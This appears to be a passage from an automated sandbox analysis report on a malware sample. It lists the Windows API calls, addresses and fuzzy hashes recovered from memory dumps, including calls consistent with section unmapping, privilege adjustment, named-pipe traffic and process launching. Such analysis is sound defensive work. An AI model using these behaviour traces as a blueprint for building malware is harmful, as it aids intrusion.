    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
